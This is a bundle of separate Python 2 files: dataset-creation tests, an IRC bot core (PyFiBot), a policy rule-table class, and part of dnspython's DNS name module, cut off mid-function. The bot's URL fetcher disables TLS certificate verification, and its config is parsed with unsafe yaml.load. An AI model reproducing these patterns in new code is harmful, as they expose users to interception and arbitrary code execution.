for local_path in (True, False):
yield self.check_textfiles, absolute_path, local_path
def check_textfiles(self, absolute_path=True, local_path=True):
"""
Create a dataset from textfiles
Arguments:
absolute_path -- if False, give relative paths and image folders
"""
textfile_train_images = ''
textfile_labels_file = ''
label_id = 0
for label, images in self.imageset_paths.iteritems():
textfile_labels_file += '%s\n' % label
for image in images:
image_path = image
if absolute_path:
image_path = os.path.join(self.imageset_folder, image_path)
textfile_train_images += '%s %d\n' % (image_path, label_id)
label_id += 1
data = {
'method': 'textfile',
'textfile_use_val': 'y',
}
if local_path:
train_file = os.path.join(self.imageset_folder, "local_train.txt")
labels_file = os.path.join(self.imageset_folder, "local_labels.txt")
# create files in local filesystem - these will be removed in tearDownClass() function
with open(train_file, "w") as outfile:
outfile.write(textfile_train_images)
with open(labels_file, "w") as outfile:
outfile.write(textfile_labels_file)
data['textfile_use_local_files'] = 'True'
data['textfile_local_train_images'] = train_file
# Use the same file for training and validation.
data['textfile_local_val_images'] = train_file
data['textfile_local_labels_file'] = labels_file
else:
# StringIO wrapping is needed to simulate POST file upload.
train_upload = (StringIO(textfile_train_images), "train.txt")
# Use the same list for training and validation.
val_upload = (StringIO(textfile_train_images), "val.txt")
labels_upload = (StringIO(textfile_labels_file), "labels.txt")
data['textfile_train_images'] = train_upload
data['textfile_val_images'] = val_upload
data['textfile_labels_file'] = labels_upload
if not absolute_path:
data['textfile_train_folder'] = self.imageset_folder
data['textfile_val_folder'] = self.imageset_folder
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
class TestImageCount(BaseViewsTestWithImageset):
def test_image_count(self):
for type in ['train','val','test']:
yield self.check_image_count, type
def check_image_count(self, type):
data = {'folder_pct_val': 20,
'folder_pct_test': 10}
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
image_count = parse_info['train_count'] + parse_info['val_count'] + parse_info['test_count']
assert parse_info['val_count'] == 0.2 * image_count
assert parse_info['test_count'] == 0.1 * image_count
else:
assert len(info['ParseFolderTasks']) == 2, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
if type == 'val':
assert parse_info['train_count'] == 0
assert parse_info['test_count'] == 0
image_count = parse_info['val_count']
else:
assert parse_info['train_count'] == 0
assert parse_info['val_count'] == 0
image_count = parse_info['test_count']
assert self.categoryCount() == parse_info['label_count']
assert image_count == DUMMY_IMAGE_COUNT * parse_info['label_count'], 'image count mismatch'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestMaxPerClass(BaseViewsTestWithImageset):
def test_max_per_class(self):
for type in ['train','val','test']:
yield self.check_max_per_class, type
def check_max_per_class(self, type):
# create dataset, asking for at most DUMMY_IMAGE_COUNT/2 images per class
assert DUMMY_IMAGE_COUNT%2 == 0
max_per_class = DUMMY_IMAGE_COUNT/2
data = {'folder_pct_val': 0}
if type == 'train':
data['folder_train_max_per_class'] = max_per_class
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
data['folder_val_max_per_class'] = max_per_class
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
data['folder_test_max_per_class'] = max_per_class
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
else:
assert len(info['ParseFolderTasks']) == 2, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
image_count = parse_info['train_count'] + parse_info['val_count'] + parse_info['test_count']
assert image_count == max_per_class * parse_info['label_count'], 'image count mismatch'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestMinPerClass(BaseViewsTestWithImageset):
UNBALANCED_CATEGORY = True
def test_min_per_class(self):
for type in ['train','val','test']:
yield self.check_min_per_class, type
def check_min_per_class(self, type):
# create dataset, asking for one more image per class
# than available in the "unbalanced" category
min_per_class = DUMMY_IMAGE_COUNT/2+1
data = {'folder_pct_val': 0}
if type == 'train':
data['folder_train_min_per_class'] = min_per_class
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
data['folder_val_min_per_class'] = min_per_class
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
data['folder_test_min_per_class'] = min_per_class
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
else:
assert len(info['ParseFolderTasks']) == 2, 'expected exactly two ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
assert self.categoryCount() == parse_info['label_count']+1
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestCreated(BaseViewsTestWithDataset):
"""
Tests on a dataset that has already been created
"""
def test_index_json(self):
rv = self.app.get('/index.json')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
found = False
for d in content['datasets']:
if d['id'] == self.dataset_id:
found = True
break
assert found, 'dataset not found in list'
def test_dataset_json(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert content['id'] == self.dataset_id, 'expected different job_id'
def test_mean_dimensions(self):
img_url = '/files/%s/mean.jpg' % self.dataset_id
rv = self.app.get(img_url)
assert rv.status_code == 200, 'GET on %s returned %s' % (img_url, rv.status_code)
buff = StringIO(rv.data)
buff.seek(0)
pil_image = PIL.Image.open(buff)
assert pil_image.size == (self.IMAGE_WIDTH, self.IMAGE_HEIGHT), 'image size is %s' % (pil_image.size,)
def test_edit_name(self):
status = self.edit_job(
self.dataset_id,
name='new name'
)
assert status == 200, 'failed with %s' % status
def test_edit_notes(self):
status = self.edit_job(
self.dataset_id,
notes='new notes'
)
assert status == 200, 'failed with %s' % status
def test_backend_selection(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
content = json.loads(rv.data)
for task in content['CreateDbTasks']:
assert task['backend'] == self.BACKEND
class TestCreatedGrayscale(TestCreated):
IMAGE_CHANNELS = 1
class TestCreatedWide(TestCreated):
IMAGE_WIDTH = 20
class TestCreatedTall(TestCreated):
IMAGE_HEIGHT = 20
class TestCreatedHdf5(TestCreated):
BACKEND = 'hdf5'
def test_compression_method(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
content = json.loads(rv.data)
for task in content['CreateDbTasks']:
assert task['compression'] == self.COMPRESSION
class TestCreatedHdf5Gzip(TestCreatedHdf5):
COMPRESSION = 'gzip'
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A modular python bot based on the twisted matrix irc library
@author Riku 'Shrike' Lindblad ([email protected])
@copyright Copyright (c) 2006 Riku Lindblad
@license New-Style BSD
"""
from __future__ import print_function, division
import sys
import os.path
import time
import requests
import fnmatch
import logging
import logging.handlers
import json
import jsonschema
from copy import deepcopy
import colorlogger
USE_COLOR = True
# Make requests quieter by default
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
try:
import yaml
except ImportError:
print("PyYAML not found, please install from http://pyyaml.org/wiki/PyYAML")
sys.exit(1)
# twisted imports
try:
from twisted.internet import reactor, protocol, ssl
except ImportError:
print("Twisted library not found, please install Twisted from http://twistedmatrix.com/products/download")
sys.exit(1)
# default timeout for socket connections
import socket
socket.setdefaulttimeout(20)
import botcore
from util.dictdiffer import DictDiffer
log = logging.getLogger('core')
class Network:
"""Represents an IRC network"""
def __init__(self, root, alias, address, nickname, channels=None, linerate=None, password=None, is_ssl=False):
self.root = root
self.alias = alias # network name
self.address = address # server address
self.nickname = nickname # nick to use
self.channels = channels or {} # channels to join
self.linerate = linerate
self.password = password
self.is_ssl = is_ssl
def __repr__(self):
return 'Network(%r, %r)' % (self.alias, self.address)
class InstantDisconnectProtocol(protocol.Protocol):
def connectionMade(self):
self.transport.loseConnection()
class ThrottledClientFactory(protocol.ClientFactory):
"""Client factory that inserts a slight delay to connecting and reconnecting"""
lostDelay = 10
failedDelay = 60
def clientConnectionLost(self, connector, reason):
print(connector.getDestination())
log.info("connection lost (%s): reconnecting in %d seconds" % (reason, self.lostDelay))
reactor.callLater(self.lostDelay, connector.connect)
def clientConnectionFailed(self, connector, reason):
log.info("connection failed (%s): reconnecting in %d seconds" % (reason, self.failedDelay))
reactor.callLater(self.failedDelay, connector.connect)
class PyFiBotFactory(ThrottledClientFactory):
"""python.fi bot factory"""
version = "2013-02-19"
protocol = botcore.PyFiBot
allBots = None
moduledir = os.path.join(sys.path[0], "modules/")
startTime = None
config = None
def __init__(self, config):
"""Initialize the factory"""
self.config = config
self.data = {}
self.data['networks'] = {}
self.ns = {}
# Cache url contents for 5 minutes, check for old entries every minute
#self._urlcache = timeoutdict.TimeoutDict(timeout=300, pollinterval=60)
def startFactory(self):
self.allBots = {}
self.starttime = time.time()
self._loadmodules()
ThrottledClientFactory.startFactory(self)
log.info("factory started")
def stopFactory(self):
del self.allBots
ThrottledClientFactory.stopFactory(self)
log.info("factory stopped")
def buildProtocol(self, address):
# we are connecting to a server, don't know which yet
log.info("Building protocol for %s", address)
# Go through all defined networks
for network, server in self.data['networks'].items():
log.debug("Looking for matching network: %s - %s", server, address)
# get all of the ipv4 and ipv6 addresses configured for this domain name
addrinfo = socket.getaddrinfo(server.address[0], server.address[1])
ips = set()
for ip in addrinfo:
ips.add(ip[4][0]) # (2, 1, 6, '', ('192.168.191.241', 6667))
# if the address we are connecting to matches one of the IPs defined for
# this network, connect to it and stop looking
if address.host in ips:
log.debug("Connecting to %s / %s", server, address)
p = self.protocol(server)
self.allBots[server.alias] = p
p.factory = self
return p
# TODO: Remove this handling altogether
log.debug("Fall back to old process...")
fqdn = socket.getfqdn(address.host)
log.debug("Address: %s - %s", address, fqdn)
# Fallback to the old, stupid, way of connecting
for network, server in self.data['networks'].items():
log.debug("Looking for matching network: %s - %s", server, fqdn)
found = False
if server.address[0] == fqdn:
log.debug("fqdn matches server address")
found = True
if server.address[0] == address.host:
log.debug("host matches server address")
found = True
if found:
log.debug("Connecting to %s / %s", server, address)
p = self.protocol(server)
self.allBots[server.alias] = p
p.factory = self
return p
# No address found
log.error("Unknown network address: " + repr(address))
return InstantDisconnectProtocol()
def createNetwork(self, address, alias, nickname, channels=None, linerate=None, password=None, is_ssl=False):
self.setNetwork(Network("data", alias, address, nickname, channels, linerate, password, is_ssl))
def setNetwork(self, net):
nets = self.data['networks']
nets[net.alias] = net
self.data['networks'] = nets
def clientConnectionLost(self, connector, reason):
"""Connection lost for some reason"""
log.info("connection to %s lost: %s" % (str(connector.getDestination().host), reason))
# find bot that connects to the address that just disconnected
for n in self.data['networks'].values():
dest = connector.getDestination()
if (dest.host, dest.port) == n.address:
if n.alias in self.allBots:
# did we quit intentionally?
if not self.allBots[n.alias].hasQuit:
# nope, reconnect
ThrottledClientFactory.clientConnectionLost(self, connector, reason)
del self.allBots[n.alias]
return
else:
log.info("No active connection to known network %s" % n.address[0])
def _finalize_modules(self):
"""Call all module finalizers"""
for module in self._findmodules():
# if rehashing (module already in namespace), finalize the old instance first
if module in self.ns:
if 'finalize' in self.ns[module][0]:
log.info("finalize - %s" % module)
self.ns[module][0]['finalize']()
def _loadmodules(self):
"""Load all modules"""
self._finalize_modules()
for module in self._findmodules():
env = self._getGlobals()
log.info("load module - %s" % module)
# Load new version of the module
execfile(os.path.join(self.moduledir, module), env, env)
# Initialize module
if 'init' in env:
log.info("initialize module - %s" % module)
env['init'](self)
# Add to namespace so we can find it later
self.ns[module] = (env, env)
def _unload_removed_modules(self):
"""Unload modules removed from modules -directory"""
# find all modules in namespace, which aren't present in modules -directory
removed_modules = [m for m in self.ns if not m in self._findmodules()]
for m in removed_modules:
# finalize module before deleting it
# TODO: use general _finalize_modules instead of copy-paste
if 'finalize' in self.ns[m][0]:
log.info("finalize - %s" % m)
self.ns[m][0]['finalize']()
del self.ns[m]
log.info('removed module - %s' % m)
def _findmodules(self):
"""Find all modules"""
modules = [m for m in os.listdir(self.moduledir) if m.startswith("module_") and m.endswith(".py")]
return modules
def _getGlobals(self):
"""Global methods for modules"""
g = {}
g['getUrl'] = self.get_url
g['get_url'] = self.get_url
g['getNick'] = self.getNick
g['isAdmin'] = self.isAdmin
g['to_utf8'] = self.to_utf8
g['to_unicode'] = self.to_unicode
return g
def get_url(self, url, nocache=False, params=None, headers=None, cookies=None):
return self.getUrl(url, nocache, params, headers, cookies)
def getUrl(self, url, nocache=False, params=None, headers=None, cookies=None):
"""Gets data, bs and headers for the given url, using the internal cache if necessary"""
# TODO: Make this configurable in the config
browser = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
# Common session for all requests
s = requests.session()
s.verify = False
s.stream = True # Don't fetch content unless asked
s.headers.update({'User-Agent': browser})
# Custom headers from requester
if headers:
s.headers.update(headers)
# Custom cookies from requester
if cookies:
s.cookies.update(cookies)
try:
r = s.get(url, params=params)
except requests.exceptions.InvalidSchema:
log.error("Invalid schema in URI: %s" % url)
return None
except requests.exceptions.ConnectionError:
log.error("Connection error when connecting to %s" % url)
return None
size = int(r.headers.get('Content-Length', 0)) // 1024
#log.debug("Content-Length: %dkB" % size)
if size > 2048:
log.warn("Content too large, will not fetch: %skB %s" % (size, url))
return None
return r
def getNick(self, user):
"""Parses nick from nick!user@host
@type user: string
@param user: nick!user@host
@return: nick"""
return user.split('!', 1)[0]
def isAdmin(self, user):
"""Check if an user has admin privileges.
@return: True or False"""
for pattern in self.config['admins']:
if fnmatch.fnmatch(user, pattern):
return True
return False
def to_utf8(self, _string):
"""Convert string to UTF-8 if it is unicode"""
if isinstance(_string, unicode):
_string = _string.encode("UTF-8")
return _string
def to_unicode(self, _string):
"""Convert string to UTF-8 if it is unicode"""
if not isinstance(_string, unicode):
try:
_string = unicode(_string)
except:
try:
_string = _string.decode('utf-8')
except:
_string = _string.decode('iso-8859-1')
return _string
def reload_config(self):
"""Reload config-file while bot is running (on rehash)"""
log = logging.getLogger('reload_config')
config = read_config()
if not config:
return
valid_config = validate_config(config)
if not valid_config:
log.info('Invalid config file!')
return
log.info('Valid config file found, reloading...')
# ignore nick and networks, as we don't want rehash to change these values
ignored = ['nick', 'networks']
# make a deep copy of old config, so we don't remove values from it
old_config = deepcopy(self.config)
# remove ignored values to make comparing/updating easier and safer
for k in ignored:
old_config.pop(k, {})
config.pop(k, {})
# Get diff between configs
dd = DictDiffer(config, old_config)
for k in dd.added():
log.info('%s added (%s: %s' % (k, k, config[k]))
self.config[k] = config[k]
for k in dd.removed():
log.info('%s removed (%s: %s)' % (k, k, old_config[k]))
del self.config[k]
for k in dd.changed():
log.info('%s changed' % k)
# compare configs
d = DictDiffer(config[k], old_config[k])
# add all changes to a big list
changes = list(d.added())
changes.extend(list(d.removed()))
changes.extend(list(d.changed()))
# loop through changes and log them individually
for x in changes:
log.info('%s[\'%s\']: \'%s\' -> \'%s\'' % (k, x, old_config[k].get(x, {}), config[k].get(x, {})))
# replace the whole object
self.config[k] = config[k]
# change logging level, default to INFO
log_level = config.get('logging', {}).get('debug', False)
if log_level:
logging.root.setLevel(logging.DEBUG)
else:
logging.root.setLevel(logging.INFO)
def init_logging(config):
logger = logging.getLogger()
if config.get('debug', False):
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
if USE_COLOR:
FORMAT = "[%(asctime)-15s][%(levelname)-20s][$BOLD%(name)-15s$RESET] %(message)s"
# Append file name + number if debug is enabled
if config.get('debug', False):
FORMAT = "%s %s" % (FORMAT, " ($BOLD%(filename)s$RESET:%(lineno)d)")
COLOR_FORMAT = colorlogger.formatter_message(FORMAT, True)
formatter = colorlogger.ColoredFormatter(COLOR_FORMAT)
else:
FORMAT = "%(asctime)-15s %(levelname)-8s %(name)-11s %(message)s"
formatter = logging.Formatter(FORMAT)
# Append file name + number if debug is enabled
if config.get('debug', False):
FORMAT = "%s %s" % (FORMAT, " (%(filename)s:%(lineno)d)")
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger.addHandler(handler)
def read_config():
config_file = sys.argv[1] or os.path.join(sys.path[0], "config.yml")
if os.path.exists(config_file):
config = yaml.load(file(config_file))
else:
print("No config file found, please edit example.yml and rename it to config.yml")
return
return config
def validate_config(config):
schema = json.load(file(os.path.join(sys.path[0], "config_schema.json")))
log.info("Validating configuration")
v = jsonschema.Draft3Validator(schema)
if not v.is_valid(config):
log.error("Error(s) in configuration:")
for error in sorted(v.iter_errors(config), key=str):
log.error(error)
return False
log.info("Config ok")
return True
def main():
sys.path.append(os.path.join(sys.path[0], 'lib'))
config = read_config()
# if config not found or can't validate it, exit with error
if not config or not validate_config(config):
sys.exit(1)
init_logging(config.get('logging', {}))
factory = PyFiBotFactory(config)
for network, settings in config['networks'].items():
# settings = per network, config = global
nick = settings.get('nick', None) or config['nick']
linerate = settings.get('linerate', None) or config.get('linerate', None)
password = settings.get('password', None)
is_ssl = bool(settings.get('is_ssl', False))
port = int(settings.get('port', 6667))
# normalize channel names to prevent internal confusion
chanlist = []
for channel in settings['channels']:
if channel[0] not in '&#!+':
channel = '#' + channel
chanlist.append(channel)
server_name = settings['server']
factory.createNetwork((server_name, port), network, nick, chanlist, linerate, password, is_ssl)
if is_ssl:
log.info("connecting via SSL to %s:%d" % (server_name, port))
reactor.connectSSL(server_name, port, factory, ssl.ClientContextFactory())
else:
log.info("connecting to %s:%d" % (server_name, port))
reactor.connectTCP(server_name, port, factory)
reactor.run()
if __name__ == '__main__':
main()
|
|
import os
import sys
import time
import exceptions
import copy
import logging
from threading import Thread, Lock
import uuid
try:
import cPickle as pickle
except:
import pickle
'''
@author: msune,lbergesio,omoya,cbermudo,CarolinaFernandez
@organization: i2CAT, OFELIA FP7
PolicyEngine RuleTable class
Encapsulates logic of a simple Rule Table
'''
from monscale.pypelib.resolver.Resolver import Resolver
from monscale.pypelib.Rule import Rule,TerminalMatch
from monscale.pypelib.parsing.ParseEngine import ParseEngine
from monscale.pypelib.persistence.PersistenceEngine import PersistenceEngine
from monscale.pypelib.utils.Logger import Logger
from monscale.pypelib.utils.Exceptions import *
class RuleEntry():
rule = None
enabled = True
def __init__(self,rule, enabled=True):
self.rule = rule
self.enabled = enabled
class RuleTable():
logger = Logger.getLogger()
uuid=None
name=None
_persist = None
_parser = None
_persistenceBackend = None
_persistenceBackendParameters=None
#Default table policy
_policy = None
_ruleSet = None
_mappings = None
_mutex = None
_resolver = None
#Constructor
def __init__(self,name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType = False, uuid = None,**kwargs):
if not isinstance(pType,bool):
raise Exception("Unknown default table policy")
self.uuid = uuid
self.name = name
self._mutex = Lock()
self._policy = pType
self._parser = defaultParser
self._persistenceBackend = defaultPersistence
self._persist = defaultPersistenceFlag
self._mappings = resolverMappings
self._ruleSet = list()
self._persistenceBackendParameters = kwargs
if self._persist:
self.save(self._persistenceBackend,**kwargs)
#Generate the resolver
self._resolver = Resolver(resolverMappings)
#Deep copy
def clone(self):
#XXX: in principle mutex is not needed since methods calling clone() are already protected
#with self._mutex:
cpTable = RuleTable(self.name,None,self._parser,self._persistenceBackend, False,self._policy,self.uuid, **self._persistenceBackendParameters)
cpTable._mutex = None
cpTable._persist = copy.deepcopy(self._persist)
cpTable._ruleSet = copy.deepcopy(self._ruleSet)
cpTable._resolver = None
return cpTable
#Determine rule position
def _getRuleIndex(self, rule):
for it in self._ruleSet:
if it.rule == rule:
return self._ruleSet.index(it)
return None
def getRule(self, index):
return self._ruleSet[index].rule
#Add, move and remove rule
def addRule(self,string,enabled=True,pos=None,parser=None,pBackend=None,persist=True):
if not parser:
parser = self._parser
rule = ParseEngine.parseRule(string, parser)
rule.setUUID(uuid.uuid4().hex)
with self._mutex:
if pos > len(self._ruleSet):
#raise Exception("Invalid position")
self._ruleSet.append(RuleEntry(rule,enabled))
elif pos !=None:
self._ruleSet.insert(pos,RuleEntry(rule,enabled))
else:
self._ruleSet.append(RuleEntry(rule,enabled))
if self._persist:
self.save()
def removeRule(self,rule=None, index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to remove; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet.pop(index)
if self._persist:
self.save()
def moveRule(self, newIndex, rule=None, index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to move; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet.insert(newIndex, self._ruleSet.pop(index))
if self._persist:
self.save()
def _modEnableRule(self, enable, rule=None,index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to enable; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet[index].enabled = enable
if self._persist:
self.save()
def enableRule(self, rule=None, index=None):
return self._modEnableRule(True,rule,index)
def disableRule(self, rule=None, index= None):
return self._modEnableRule(False,rule,index)
def setPolicy(self, policy):
if not isinstance(policy,bool):
raise Exception("Unknown default table policy")
with self._mutex:
self._policy = policy
if self._persist:
self.save()
def setParser(self, parser):
with self._mutex:
self._parser = parser
if self._persist:
self.save()
def setPersistenceBackend(self, persistenceBackend):
with self._mutex:
self._persistenceBackend = persistenceBackend
if self._persist:
self.save()
def setPersistenceFlag(self, persistenceFlag):
with self._mutex:
self._persist = persistenceFlag
if self._persist:
self.save()
def setMappings(self, mappings):
with self._mutex:
self._mappings = mappings
if self._persist:
self.save()
def dump(self):
print "Table: "+self.name+" UUID: "+str(self.uuid)
print "NUmber of rules: "+str(len(self._ruleSet))
with self._mutex:
i=0
for it in self._ruleSet:
print "[%s]:"%i +it.rule.dump()+ " Enabled: "+str(it.enabled)
i+=1
print "Default policy: "+str(self._policy)
#Go through the table
def evaluate(self,metaObj):
#Iterate over ruleset
with self._mutex:
for it in self._ruleSet:
if it.enabled:
try:
it.rule.evaluate(metaObj,self._resolver)
except TerminalMatch as terminal:
if terminal.value:
return True
else:
raise terminal
if self._policy:
return self._policy
else:
raise Exception("Policy verification failed. Policy type is DENY")
def save(self, pBackend=None,**kwargs):
if not pBackend:
pBackend = self._persistenceBackend
if not kwargs:
kwargs2 = self._persistenceBackendParameters
else:
kwargs2 = kwargs
PersistenceEngine.save(self,pBackend,**kwargs2)
#In general should not be called, use loadOrGenerate instead
@staticmethod
def load(name, resolverMappings, pBackend, **kwargs):
return PersistenceEngine.load(name,pBackend,resolverMappings,**kwargs)
@staticmethod
def loadOrGenerate(name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType=False, uuid=None,**kwargs):
try:
return PersistenceEngine.load(name,defaultPersistence, resolverMappings, defaultParser,**kwargs)
except ZeroPolicyObjectsReturned:
RuleTable.logger.warning("Unable to load RuleTable, generating a new one")
return RuleTable(name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType, uuid,**kwargs)
except MultiplePolicyObjectsReturned:
RuleTable.logger.warning("Unable to load a single RuleTable, asking the user")
raise MultiplePolicyObjectsReturned
except Exception as e:
RuleTable.logger.error("Unable to load RuleTable. Exception: %s" % str(e))
'''
Retrieves every Engine's PolicyRuleTable object for a given name.
This method should be seldom used.
'''
@staticmethod
def loadAll(name, defaultPersistence):
return PersistenceEngine.loadAll(name, defaultPersistence)
'''
Deletes a Engine's PolicyRuleTable object for a given ID.
This method should be seldom used.
'''
@staticmethod
def delete(tableID, defaultPersistence):
return PersistenceEngine.delete(tableID, defaultPersistence)
#Getters
def getRuleSet(self):
return self._ruleSet
def getName(self):
return self.name
def getPolicyType(self):
return self._policy
def getPersistence(self):
return self._persistenceBackend
def getParser(self):
return self._parser
def getResolverMappings(self):
return self._mappings
def getPersistenceFlag(self):
return self._persist
|
|
# Copyright (C) 2001-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS Names.
@var root: The DNS root name.
@type root: dns.name.Name object
@var empty: The empty DNS name.
@type empty: dns.name.Name object
"""
import cStringIO
import struct
import sys
import copy
if sys.hexversion >= 0x02030000:
import encodings.idna
import dns.exception
import dns.wiredata
NAMERELN_NONE = 0
NAMERELN_SUPERDOMAIN = 1
NAMERELN_SUBDOMAIN = 2
NAMERELN_EQUAL = 3
NAMERELN_COMMONANCESTOR = 4
class EmptyLabel(dns.exception.SyntaxError):
"""Raised if a label is empty."""
pass
class BadEscape(dns.exception.SyntaxError):
"""Raised if an escaped code in a text format name is invalid."""
pass
class BadPointer(dns.exception.FormError):
"""Raised if a compression pointer points forward instead of backward."""
pass
class BadLabelType(dns.exception.FormError):
"""Raised if the label type of a wire format name is unknown."""
pass
class NeedAbsoluteNameOrOrigin(dns.exception.DNSException):
"""Raised if an attempt is made to convert a non-absolute name to
wire when there is also a non-absolute (or missing) origin."""
pass
class NameTooLong(dns.exception.FormError):
"""Raised if a name is > 255 octets long."""
pass
class LabelTooLong(dns.exception.SyntaxError):
"""Raised if a label is > 63 octets long."""
pass
class AbsoluteConcatenation(dns.exception.DNSException):
"""Raised if an attempt is made to append anything other than the
empty name to an absolute name."""
pass
class NoParent(dns.exception.DNSException):
"""Raised if an attempt is made to get the parent of the root name
or the empty name."""
pass
_escaped = {
'"' : True,
'(' : True,
')' : True,
'.' : True,
';' : True,
'\\' : True,
'@' : True,
'$' : True
}
def _escapify(label, unicode_mode=False):
"""Escape the characters in label which need it.
@param unicode_mode: escapify only special and whitespace (<= 0x20)
characters
@returns: the escaped string
@rtype: string"""
text = ''
for c in label:
if c in _escaped:
text += '\\' + c
elif ord(c) > 0x20 and ord(c) < 0x7F:
text += c
else:
if unicode_mode and ord(c) >= 0x7F:
text += c
else:
text += '\\%03d' % ord(c)
return text
def _validate_labels(labels):
"""Check for empty labels in the middle of a label sequence,
labels that are too long, and for too many labels.
@raises NameTooLong: the name as a whole is too long
@raises LabelTooLong: an individual label is too long
@raises EmptyLabel: a label is empty (i.e. the root label) and appears
in a position other than the end of the label sequence"""
l = len(labels)
total = 0
i = -1
j = 0
for label in labels:
ll = len(label)
total += ll + 1
if ll > 63:
raise LabelTooLong
if i < 0 and label == '':
i = j
j += 1
if total > 255:
raise NameTooLong
if i >= 0 and i != l - 1:
raise EmptyLabel
class Name(object):
"""A DNS name.
The dns.name.Name class represents a DNS name as a tuple of labels.
Instances of the class are immutable.
@ivar labels: The tuple of labels in the name. Each label is a string of
up to 63 octets."""
__slots__ = ['labels']
def __init__(self, labels):
"""Initialize a domain name from a list of labels.
@param labels: the labels
@type labels: any iterable whose values are strings
"""
super(Name, self).__setattr__('labels', tuple(labels))
_validate_labels(self.labels)
def __setattr__(self, name, value):
raise TypeError("object doesn't support attribute assignment")
def __copy__(self):
return Name(self.labels)
def __deepcopy__(self, memo):
return Name(copy.deepcopy(self.labels, memo))
def is_absolute(self):
"""Is the most significant label of this name the root label?
@rtype: bool
"""
return len(self.labels) > 0 and self.labels[-1] == ''
def is_wild(self):
"""Is this name wild? (I.e. Is the least significant label '*'?)
@rtype: bool
"""
return len(self.labels) > 0 and self.labels[0] == '*'
def __hash__(self):
"""Return a case-insensitive hash of the name.
@rtype: int
"""
h = 0L
for label in self.labels:
for c in label:
h += ( h << 3 ) + ord(c.lower())
return int(h % sys.maxint)
def fullcompare(self, other):
"""Compare two names, returning a 3-tuple (relation, order, nlabels).
I{relation} describes the relation ship beween the names,
and is one of: dns.name.NAMERELN_NONE,
dns.name.NAMERELN_SUPERDOMAIN, dns.name.NAMERELN_SUBDOMAIN,
dns.name.NAMERELN_EQUAL, or dns.name.NAMERELN_COMMONANCESTOR
I{order} is < 0 if self < other, > 0 if self > other, and ==
0 if self == other. A relative name is always less than an
absolute name. If both names have the same relativity, then
the DNSSEC order relation is used to order them.
I{nlabels} is the number of significant labels that the two names
have in common.
"""
sabs = self.is_absolute()
oabs = other.is_absolute()
if sabs != oabs:
if sabs:
return (NAMERELN_NONE, 1, 0)
else:
return (NAMERELN_NONE, -1, 0)
l1 = len(self.labels)
l2 = len(other.labels)
ldiff = l1 - l2
if ldiff < 0:
l = l1
else:
l = l2
